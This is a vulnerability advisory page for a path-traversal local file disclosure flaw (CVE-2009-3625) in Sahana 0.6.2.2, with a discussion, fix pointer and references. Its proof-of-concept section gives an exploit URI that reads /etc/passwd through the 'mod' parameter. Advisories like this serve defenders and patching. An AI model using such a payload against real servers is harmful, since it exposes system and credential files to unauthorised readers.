Sahana 'mod' Parameter Local File Disclosure Vulnerability
BID:36826
Info
Sahana 'mod' Parameter Local File Disclosure Vulnerability
| Bugtraq ID: | 36826 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3625 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 27 2009 12:00AM |
| Updated: | May 07 2015 05:06PM |
| Credit: | Greg Miernicki |
| Vulnerable: |
Sahana Group Sahana 0.6.2 .2 |
| Not Vulnerable: | |
Discussion
Sahana 'mod' Parameter Local File Disclosure Vulnerability
Sahana is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Sahana 0.6.2.2 is vulnerable; other versions may also be affected.
Sahana is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Sahana 0.6.2.2 is vulnerable; other versions may also be affected.
Exploit / POC
Sahana 'mod' Parameter Local File Disclosure Vulnerability
Attackers may exploit this issue through a browser.
The following exploit URI is available:
http://www.example.com/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00
Attackers may exploit this issue through a browser.
The following exploit URI is available:
http://www.example.com/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00
Solution / Fix
Sahana 'mod' Parameter Local File Disclosure Vulnerability
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
Sahana 'mod' Parameter Local File Disclosure Vulnerability
References:
References:
- CVE-2009-3625 Sahana: Arbitrary files access due improper processing of URLs wit (Red Hat)
- Sahana Homepage (Sahana Group)
- SEVERE Security Vulnerability in Sahana Identified and Patched (Sahana Group)